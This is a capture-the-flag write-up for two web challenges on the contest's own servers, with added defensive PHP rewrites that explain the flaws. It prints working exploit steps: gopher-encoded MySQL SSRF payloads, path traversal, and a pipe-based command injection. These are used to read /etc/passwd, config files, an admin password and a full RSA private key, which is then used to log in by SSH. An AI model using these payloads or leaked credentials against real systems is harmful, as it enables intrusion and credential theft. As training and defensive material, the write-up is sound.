CTF
Name : ESGI Security Day 7th Edition
Website : ctf.hacklab-esgi.org
Type : Online/On-site
Format : Jeopardy
100 - Rookie - Web
(▀̿Ĺ̯▀̿ ̿)
M0th3r > Hey, what? You were expecting the great, legendary M0th3r? Sorry to disappoint you. I hear you want to serve the cause? You found me, but it's not won yet. It's not certain I'll take you under my wing.
Here, train yourself, and maybe we'll see whether you have what it takes to be a Cyber Pirate.
ctf.hacklab-esgi.org:8082
There is an SSRF, let's dump source code of the challenge:
```
curl -v 'file:///proc/self/cwd/index.php'
```

```php
<?php include_once "config_test.php"; ?>
<html>
<head>
<title>Super curling</title>
<meta charset="utf-8" />
<style type="text/css">
body {
    text-align: center;
    background-color:
    font-family: "Gill Sans Extrabold", sans-serif;
}
</style>
</head>
<body>
<h1>Website checker</h1>
<p>Nous utilisons une nouvelle technologie parfaitement sûre pour tester vos divers sites internet. N'hésitez pas à nous donner du Dodgecoin!</p>
<form action="index.php" method="post">
URL Checker : <input type="text" name='url' />
</form>
<?php
if (isset($_POST['url']) && !empty($_POST['url'])) {
    $url = $_POST['url'];
    $content_url = getUrlContent($url);
} else {
    $content_url = "";
}
?>
</body>
</html>
```
```
curl -v 'file:///proc/self/cwd/config_test.php'
```

```php
<?php
function getUrlContent($url) {
    $url = escapeshellarg($url);
    $pl = "curl -v " . $url;
    echo $pl;
    $content = shell_exec($pl);
    echo $content;
    return $content;
}
?>
```
The `escapeshellarg` bypasses with curl are not very interesting here: https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md#curl
Let's try MySQL command execution through a gopher SSRF thanks to PHP wrappers:
```
$ gopherus --exploit mysql

  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: tiix

Give query to execute: \! id

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%06%00%00%00%03%5c%21%20%69%64%01%00%00%00%01

-----------Made-by-SpyD3r-----------
```
The gopher SSRF worked, but it seems command execution won't be possible. It confirmed that we have 5.5.5-10.1.37-MariaDB-0+deb9u1 and that the `tiix` user works without a password.
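The root problem in `config_test.php` is that user input is handed to a shell and to a `curl` that speaks every protocol it was built with (`file://`, `gopher://`, ...), so escaping the argument does nothing against SSRF. Below is an added example of how the checker could be written defensively; it is not the challenge's code, and the function names (`ssrf_reject_reason`, `resolve_public_ip`, `getUrlContentSafe`) are this example's own:

```php
<?php
// Added example (not the challenge's code): a hardened replacement for the
// getUrlContent() of config_test.php. Function names are this example's own.

// Structural checks on the URL. Returns null when acceptable, else a reason.
function ssrf_reject_reason(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme'])) {
        return 'unparseable URL';
    }
    // Scheme allow-list: file://, gopher://, dict:// etc. stop here.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return 'scheme not allowed';
    }
    if (empty($parts['host'])) {
        return 'missing host';
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return 'credentials in URL';
    }
    // Port allow-list: no http://127.0.0.1:3306/ style probes of local services.
    if (isset($parts['port']) && !in_array($parts['port'], [80, 443], true)) {
        return 'port not allowed';
    }
    return null;
}

// Resolve the host ourselves and refuse loopback, private and reserved ranges,
// so that 127.0.0.1, 10.0.0.0/8 or 169.254.169.254 are unreachable even behind
// a DNS name. Returns the validated IPv4 address, or null.
function resolve_public_ip(string $host): ?string
{
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        // Literal IP: it must itself be public.
        return filter_var($host, FILTER_VALIDATE_IP, $flags) !== false ? $host : null;
    }
    $ips = gethostbynamel($host);          // IPv4 only; AAAA-only names are refused
    if ($ips === false) {
        return null;
    }
    foreach ($ips as $ip) {                // every address must be public, not just the first
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return null;
        }
    }
    return $ips[0];
}

function getUrlContentSafe(string $url): string
{
    if (($why = ssrf_reject_reason($url)) !== null) {
        return "refused: $why";
    }
    $parts = parse_url($url);
    $host  = $parts['host'];
    $port  = $parts['port'] ?? (strtolower($parts['scheme']) === 'https' ? 443 : 80);
    $ip    = resolve_public_ip($host);
    if ($ip === null) {
        return 'refused: host does not resolve to a public address';
    }

    // The curl extension, never shell_exec("curl ..."): no shell, no argument
    // string, and the protocol set is restricted at the library level too.
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,   // a redirect to an internal host would skip every check above
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => 1024 * 1024,
        // Pin the connection to the address we validated, so a second lookup
        // inside curl (DNS rebinding) cannot swap in an internal address.
        CURLOPT_RESOLVE        => ["$host:$port:$ip"],
    ]);
    $body = curl_exec($ch);
    $err  = curl_error($ch);
    curl_close($ch);

    if ($body === false) {
        return "fetch failed: $err";
    }
    // The fetched page is untrusted HTML; escape it before echoing.
    return htmlspecialchars($body, ENT_QUOTES, 'UTF-8');
}

// Usage, what index.php would call instead of getUrlContent():
// echo getUrlContentSafe($_POST['url'] ?? '');
```

Two things the URL checks do not cover on their own: a redirect or a second DNS lookup could still land on an internal host, which is why redirects are disabled and the validated address is pinned with `CURLOPT_RESOLVE`; and the MySQL step only worked because a local account (`tiix`) had no password, a database configuration problem that no URL filtering fixes. The failure of `\! id` is expected in any case: `\!` is a `mysql` client-side command and is never sent to the server.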
Let's take a look at the current DB:
```
gopherus --exploit mysql
...
Give MySQL username: tiix

Give query to execute: SHOW DATABASES

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%0f%00%00%00%03%53%48%4f%57%20%44%41%54%41%42%41%53%45%53%01%00%00%00%01
```

Then the tables of the `securityday` database (gopherus banner trimmed from here on):

```
gopherus --exploit mysql
...
Give MySQL username: tiix

Give query to execute: SHOW TABLES from securityday

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1d%00%00%00%03%53%48%4f%57%20%54%41%42%4c%45%53%20%66%72%6f%6d%20%73%65%63%75%72%69%74%79%64%61%79%01%00%00%00%01

-----------Made-by-SpyD3r-----------
```

The columns of the `nothinghere` table:

```
gopherus --exploit mysql
...
Give MySQL username: tiix

Give query to execute: SHOW COLUMNS FROM nothinghere FROM securityday

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%2f%00%00%00%03%53%48%4f%57%20%43%4f%4c%55%4d%4e%53%20%46%52%4f%4d%20%6e%6f%74%68%69%6e%67%68%65%72%65%20%46%52%4f%4d%20%73%65%63%75%72%69%74%79%64%61%79%01%00%00%00%01

-----------Made-by-SpyD3r-----------
```

And finally the `flag` column itself:

```
$ gopherus --exploit mysql
...
Give MySQL username: tiix

Give query to execute: USE securityday; SELECT flag FROM nothinghere

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%2e%00%00%00%03%55%53%45%20%73%65%63%75%72%69%74%79%64%61%79%3b%20%53%45%4c%45%43%54%20%66%6c%61%67%20%46%52%4f%4d%20%6e%6f%74%68%69%6e%67%68%65%72%65%01%00%00%00%01

-----------Made-by-SpyD3r-----------
```
The flag was ESGI{W3lC0me_R00ki3_M0th3r_1s_0ld}.
(unsolved) 350 - My Name is Rookie - Web
(ง ͠° ͟ل͜ ͡°)ง
M0th3r > Something is bothering me. How could an Android pass the cyber-pirate test? Duke, the first of his kind, was not created by anyone from the government. He has since disappeared, and I want to recover his core. If you want to help me, you have to pass the cyber-pirate test. It is the test that Duke-083 passed with flying colours. Gather everything you can find about Zedcorp.
http = ctf.hacklab-esgi.org:5008
ssh = ctf.hacklab-esgi.org:5007
Warning: I didn't manage to get to the last part of the challenge.
```
$ curl http://ctf.hacklab-esgi.org:5008/robots.txt
User-agent: *
Disallow: /assets
Disallow: /js
Disallow: /api
Disallow: /logs
Disallow: /images
```
In the file http://ctf.hacklab-esgi.org:5008/logs/access.log we can see POST and GET requests to `/0cc175b9c0f1b6a831c399e269772661/admin.php`.
We also found http://ctf.hacklab-esgi.org:5008/login.php.
In `access-details.log` we get the admin credentials: `admin` / `pxrAW7a4HNMBw86bc`.
On the admin dashboard there is a TODO list:

Todo
1. Finish log functionality.
   - Monitor login POST data from modsecurity log.
   - Create script to detect spam.
2. Implement contact functionality.
3. Create script to generate ssh key all 2 weeks.
We can also display 3 logs: access, error, and other vhosts access.
A typical request is:
```
$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=error.log'
```
Trying a path traversal LFI we get the wanted file:
```
$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=../../../../../../../etc/passwd'
...
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
test:x:1001:1001:,,,:/home/test:/usr/sbin/nologin
trobin:x:1004:1004:Thibaud Robin,8,0145674356,0145674356,Trainee full stack developer:/home/trobin:/bin/bash
...
```
We may use `trobin` for ssh access.
Only the last 10 lines of the file are disclosed, so the log filename must be appended to a default `tail` command, but hopefully we can append options to `tail`.
However, there is a filter: we can't send a semicolon `;` or a null byte `%00`.
Let's try to disclose source of the challenge:
```
$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=../../../../../../../var/www/html/0cc175b9c0f1b6a831c399e269772661/admin.php -n 10000'
```
```php
<?php
session_start();
if (!isset($_SESSION['logged'])) {
    header('Location: ../index.php');
    die();
}
?>
<!DOCTYPE HTML>
<html>
<head>
    <title>My Personnal Website - Admin</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
    <link rel="stylesheet" href="../assets/css/main.css" />
    <noscript><link rel="stylesheet" href="../assets/css/noscript.css" /></noscript>
</head>
<body class="is-preload">
    <!-- Wrapper -->
    <div id="wrapper">
        <!-- Header -->
        <header id="header">
            <a href="../index.html" class="logo"><strong>My Personnal Website</strong></a>
            <nav>
                <a href="#menu">Menu</a>
            </nav>
        </header>
        <!-- Menu -->
        <nav id="menu">
            <ul class="links">
                <li><a href="../index.html">Home</a></li>
            </ul>
        </nav>
        <!-- Main -->
        <div id="main" class="alt" style="border-color:transparent;">
            <!-- One -->
            <section id="one">
                <div class="inner">
                    <header class="major">
                        <h1>Admin panel</h1>
                    </header>
                    <!-- Content -->
                    <h4>Todo</h4>
                    <ol>
                        <li>Finish log functionality.</li>
                        <ul style="margin:0 0 0 0">
                            <li>Monitor login POST data from modsecurity log.</li>
                            <li>Create script to detect spam.</li>
                        </ul>
                        <li>Implement contact functionality.</li>
                        <li>Create script to generate ssh key all 2 weeks.</li>
                    </ol>
                    <hr>
                    <h4>Log</h4>
                    <form method="post" action="#">
                        <div class="col-4 col-12-small">
                            <input type="radio" name="log" id="access" value="access.log" checked>
                            <label for="access">Access</label>
                        </div>
                        <div class="col-4 col-12-small">
                            <input type="radio" name="log" id="error" value="error.log">
                            <label for="error">Error</label>
                        </div>
                        <div class="col-4 col-12-small">
                            <input type="radio" name="log" id="vhost" value="other_vhosts_access.log">
                            <label for="vhost">Other vhosts access</label>
                        </div>
                        <br>
                        <input type="submit" value="Show" class="secondary" />
                    </form>
                    <?php
                    if (isset($_POST['log']) && !empty($_POST['log'])) {
                        if (preg_match("/[\"'-,;#]+/", $_POST['log'])) {
                            echo "<p><strong style='color:#e74c3c;'>Error : use of forbidden chars...</strong></p>";
                        } else {
                            $cmd = "tail -n 10 /var/log/apache2/" . $_POST['log'];
                            echo "<pre><code>";
                            system($cmd . " &");
                            echo "</code></pre>";
                        }
                    }
                    ?>
                </div>
            </section>
        </div>
    </div>
    <!-- Scripts -->
    <script src="../assets/js/jquery.min.js"></script>
    <script src="../assets/js/jquery.scrolly.min.js"></script>
    <script src="../assets/js/jquery.scrollex.min.js"></script>
    <script src="../assets/js/browser.min.js"></script>
    <script src="../assets/js/breakpoints.min.js"></script>
    <script src="../assets/js/util.js"></script>
    <script src="../assets/js/main.js"></script>
</body>
</htm>
```
The filtering regex is the following: `preg_match("/[\"'-,;#]+/", $_POST['log'])`.
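Two weaknesses in `admin.php` explain the traversal and the option injection above: the path is concatenated into a `tail` command line, and the blocklist regex is a character class in which `'-,` is a range from `'` (0x27) to `,` (0x2C), so the dash, the pipe, the dot and the slash are never matched (`login.php` uses the same range). The added example below is not the challenge's code; it shows the same log viewer written with an allow-list and no shell, and the names (`blocklist_rejects`, `selected_log_path`, `tail_lines`, `show_log`) are this example's own:

```php
<?php
// Added example (not the challenge's code): the admin.php log viewer written
// without handing user input to a shell. All names below are this example's.

// The blocklist from admin.php, kept here only to show what it does NOT block.
// Inside a character class, '-, is a RANGE from ' (0x27) to , (0x2C), so the
// class is  " ' ( ) * + , ; #  and the dash, pipe, dot and slash all pass,
// which is why "-n 10000", "../" and "| cat" were accepted while ";" was not.
function blocklist_rejects(string $input): bool
{
    return preg_match("/[\"'-,;#]+/", $input) === 1;
}

// Allow-list instead: the only valid values are the three radio buttons.
const LOG_DIR   = '/var/log/apache2';
const LOG_FILES = ['access.log', 'error.log', 'other_vhosts_access.log'];

// Map the requested name to a real path, or null if it is not one of ours.
function selected_log_path(string $requested): ?string
{
    if (!in_array($requested, LOG_FILES, true)) {
        return null;
    }
    $base = realpath(LOG_DIR);
    $path = realpath(LOG_DIR . '/' . $requested);
    // Belt and braces: even an allow-listed name must resolve inside LOG_DIR
    // (covers a log file being replaced by a symlink pointing elsewhere).
    if ($base === false || $path === false || strpos($path, $base . '/') !== 0) {
        return null;
    }
    return $path;
}

// Last $n lines, read in PHP: no tail, no system(), nothing for "&" or "|" to do.
// file() loads the whole file, fine for rotated Apache logs; stream for huge ones.
function tail_lines(string $path, int $n = 10): array
{
    $lines = file($path, FILE_IGNORE_NEW_LINES);
    if ($lines === false) {
        return [];
    }
    return array_slice($lines, -$n);
}

function show_log(string $requested): string
{
    $path = selected_log_path($requested);
    if ($path === null) {
        return "<p><strong>Error : unknown log.</strong></p>";
    }
    $out = '';
    foreach (tail_lines($path, 10) as $line) {
        // Log lines carry attacker-controlled text (URLs, User-Agent): escape them.
        $out .= htmlspecialchars($line, ENT_QUOTES, 'UTF-8') . "\n";
    }
    return "<pre><code>$out</code></pre>";
}

// Usage, replacing the preg_match()/system() branch of admin.php:
// echo show_log($_POST['log'] ?? 'access.log');
```

With an allow-list the blocklist becomes unnecessary; `blocklist_rejects()` is kept only so the range bug can be seen next to the fix. Escaping the log lines matters independently of the command injection: anything a client puts in a request line or User-Agent ends up in these files and would otherwise be rendered as HTML in the admin's browser.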
I can also dump `login.php`:
```php
<?php session_start(); ?>
<!DOCTYPE HTML>
<html>
<head>
    <title>Elements - Forty by HTML5 UP</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
    <link rel="stylesheet" href="assets/css/main.css" />
    <noscript><link rel="stylesheet" href="assets/css/noscript.css" /></noscript>
</head>
<body class="is-preload">
    <!-- Wrapper -->
    <div id="wrapper">
        <!-- Header -->
        <header id="header">
            <a href="index.php" class="logo"><strong>My Personnal Website</strong></a>
            <nav>
                <a href="#menu">Menu</a>
            </nav>
        </header>
        <!-- Menu -->
        <nav id="menu">
            <ul class="links">
                <li><a href="index.php">Home</a></li>
            </ul>
        </nav>
        <!-- Main -->
        <div id="main" class="alt" style="border-color:transparent;">
            <!-- One -->
            <section id="one">
                <div class="inner">
                    <header class="major">
                        <h1>Authentication</h1>
                    </header>
                    <?php
                    if (isset($_POST['username']) && isset($_POST['password'])) {
                        $username = htmlentities($_POST['username']);
                        $password = htmlentities($_POST['password']);
                        if ($username === "admin" && $password === "pxrAW7a4HNMBw86bc") {
                            $_SESSION['logged'] = 1;
                            header('Location: 0cc175b9c0f1b6a831c399e269772661/admin.php');
                        } else if (preg_match("/[\"'-,#]+/", "$username $password")) {
                            echo "<p><strong style='color:#e74c3c;'>Hey ! Do you try to hack me ?!</strong></p>";
                        } else {
                            echo "<p><strong style='color:#e74c3c;'>Error : incorrect credentials !</strong></p>";
                        }
                    }
                    ?>
                    <form method="post" action="login.php">
                        <div class="row gtr-uniform">
                            <div class="col-10">
                                <input type="text" name="username" value="" placeholder="Username" />
                            </div>
                            <div class="col-10">
                                <input type="password" name="password" value="" placeholder="Password" />
                            </div>
                            <div class="" lass="col-12">
                                <input type="submit" value="Connection" class="primary" />
                            </div>
                        </div>
                    </form>
                </div>
            </section>
        </div>
    </div>
    <!-- Scripts -->
    <script src="assets/js/jquery.min.js"></script>
    <script src="assets/js/jquery.scrolly.min.js"></script>
    <script src="assets/js/jquery.scrollex.min.js"></script>
    <script src="assets/js/browser.min.js"></script>
    <script src="assets/js/breakpoints.min.js"></script>
    <script src="assets/js/util.js"></script>
    <script src="assets/js/main.js"></script>
</body>
</html>
```
Let's look at `/etc/hosts` to find info on Zedcorp.
```
127.0.0.1 localhost
127.0.1.1 dev-server
10.0.0.1 dev-server dev-server.zedcorp
10.0.0.2 project-server project-server.zedcorp
10.0.0.3 admin-server admin-server.zedcorp

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```
And reading `proc/self/environ`:
```
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=8:11700
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=82b54f38b32a4bbb8c9fd813d21543f6
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/0cc175b9c0f1b6a831c399e269772661
```
The Apache configuration (`/etc/apache2/apache2.conf`) may help us; it is also what makes ModSecurity write POST bodies into the `access-details.log` we read the credentials from:
```
...
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.

# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf

# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf

# Enable the module.
SecRuleEngine On
SecAuditEngine RelevantOnly

# Setup logging in a dedicated file.
SecAuditLog /var/log/apache2/access-details.log

# Allow it to access requests body.
SecRequestBodyAccess on
SecAuditLogParts ABIFHZ

# Setup default action.
SecDefaultAction "nolog,noauditlog,allow,phase:2"

# Define the rule that will log the content of POST requests.
SecRule REQUEST_METHOD "POST" "id:800000,phase:2,t:none,pass,nolog,auditlog"

# Can read the logs on /logs
<Directory /var/www/html/logs>
    SecRuleEngine Off
</Directory>

# Authorize command injection on admin.php
<Directory /var/www/html/0cc175b9c0f1b6a831c399e269772661/admin.php>
    SecRuleEngine Off
</Directory>
```
We can also execute commands with a pipe `|`:
```
$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://ctf.hacklab-esgi.org:5008/login.php' -H 'Connection: keep-alive' -H 'Cookie: _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=hffthjjq4jil8o5at2mklo4fc4' -H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0' -X POST --data 'log=../../../../../../../var/log/apache2/access.log -n 1 | cat /home/trobin/TODO.txt'
```
`/home/trobin/TODO.txt`:

```
- Finish admin backend functionnality
- Clean up the server
```
`/home/trobin/script/get-ssh-connection`:

```bash
#!/bin/bash

cat /var/log/auth.log | grep ssh | grep "session opened"
```
`/home/test/.ssh/id_rsa`:

```
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA1f3hWbx2726sOiwm+gg8Td2261E7QSJhQHcQFEns7Ubonx6E
+YU4BgzQt136gK42RwoGOph8H/Tu0zfjGIx9IQOIDG8VmCItfUDFCexoqoZB2cj2
9sLKgA/VZqRJiSka1+uibcyIgFnyDegbSXt42J6XL6xZaT56aq539s8M/aFSWNEf
8yTBG7k4E0ZWqexBhXDK3rNJ1veH3EcJXBjYgitDLXSS/VPE7op6MlD5q7ZdNt28
45idJ5tT+U8xrht71oGiIswxi1dXz0VvjXOIJIk1iQIyRdiGIvPpHIY+Dxw2FTHo
pi7Z3M5hjoq36LQryHjVbUVaUrvkyeQtZXeDIQIDAQABAoIBAHloJrhAwsGo6rG+
ZwaoMX6D8cmkNpgHp2Fpq4e3QWKFPmk4aX0fZd+Y2bmO6hajwEuhllMcPB/tWKoh
JQjCfCOE22UiiP/dNC3B14h/xgopTab/642oijcJxKsNPmNBHOev2mGtDyyy2y+k
pgaUtMVBhMkZYUjil5V7ErjGU7p5CCqeZUditEMKq9eAAq8oNGq84L0ZKqx4dyPN
Ai36I8Nygk1SpYBod+K7lUYDDfd+ZPR/yEVhfHP9JqLdezfpeJW7SQvgc4Fb0rEY
+tvM0IfyIR/9tB7IrfNuXG6S+UjoP5eybasUMDn0sqSGYLfaq1pFZYolneDkrpeV
9mPBoAECgYEA+LJUBHTrdKWqxtwkugg05Iu5nEMTGhUmZ4b6x2MRGeadqPF6u9+R
0eubqX+oNWAKBgtHQSzE8faLnOJ6lc2oEN6jeukCDStYg//aIaEyZf2r/uBs0+zA
QNO8CQ5dXK5sowaFPgqXZ0mIFUmtDOgSm6M3IRc4BK6nYlxClVzTs4ECgYEA3Eal
GLMBNykaR0jCD1CartiTZay6ld1rCZVJWjONDgJGtzi0tW1j7Mr5jk0dwfp7cJVu
/Dx+sc4Om/nJ3h15pvvcrKnv0kPhqXX4h+dFmz2psTKmjYjpsff0eLRJS9JHVNEb
svu/zHqzzrRsm1un3Ikcvy0lnG31sg6kJ8EXH6ECgYEApe/Wv2KD+EDRwf4BQ19W
a2gPYIQgqraR+WHG0mL3diC58Y+uJMz3rulV47KZuYNrLL05vfLxNcEbRoKW6H1g
NmFXExuFkuPpG6oLEYVM62Bm8pksA/tkC907CY/cG4sGUYB4Rv0qKHCXrByMqp/u
SoqMrjef2P/wD2EfzCkz2AECgYBIr98m6VrLUvri7vVqjFSewcTR1k+zyF7byLFt
3Hj9WG7xYvruq2w/5TK4bGYXbopxOj5naab9EVvsyF5+twc/vPiy2VjT76Z1fwJG
BmEHuy9V07r2FWnYWlQHyKYvKPJ04JPdWgmOdicDXLJCCdq4gV5FD6bLmdVrrj0p
CSSSQQKBgQCI3TUMYeR/4+86B6i2sldPVtn52QrOHeaDwRfZ1Z7TRYPY6gIvKBLd
VVU6YcP0KwZUHeUOC7qNxSCTnB7FkANad+D/7a0MGqAGCmWChS5GD6zpqhW+tKkY
zc9Ur+20TJHIwAKloaZLiMdcpdyFUQQRStXCGD6wqbw8UxGfx1Fd0g==
-----END RSA PRIVATE KEY-----
```
```
$ chmod 0600 id_rsa
$ ssh test@ctf.hacklab-esgi.org -p 5007 -i id_rsa
Linux dev-server 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64

 ____        _  ___
|_  /___  __| |/ __|___ _ _ _ __
 / // -_) _` | (__/ _ \ '_| '_ \
/___\___\__,_|\___\___/_| | .__/   Dev Server
                          |_|

[HINT] : Do you know proxychains ?
Last login: Sat Apr  6 04:20:26 2019 from 78.245.84.201
This account is currently not available.
Connection to ctf.hacklab-esgi.org closed.
```
The session closes immediately because the `test` user has no shell (more exactly `/usr/sbin/nologin`).
By reading `/etc/hostname` we know we are on `dev-server`. So the flag must be on the project or admin server.
```
10.0.0.2 project-server project-server.zedcorp
10.0.0.3 admin-server admin-server.zedcorp
```
`/etc/resolv.conf` is configured with `nameserver 192.168.122.1`.
```
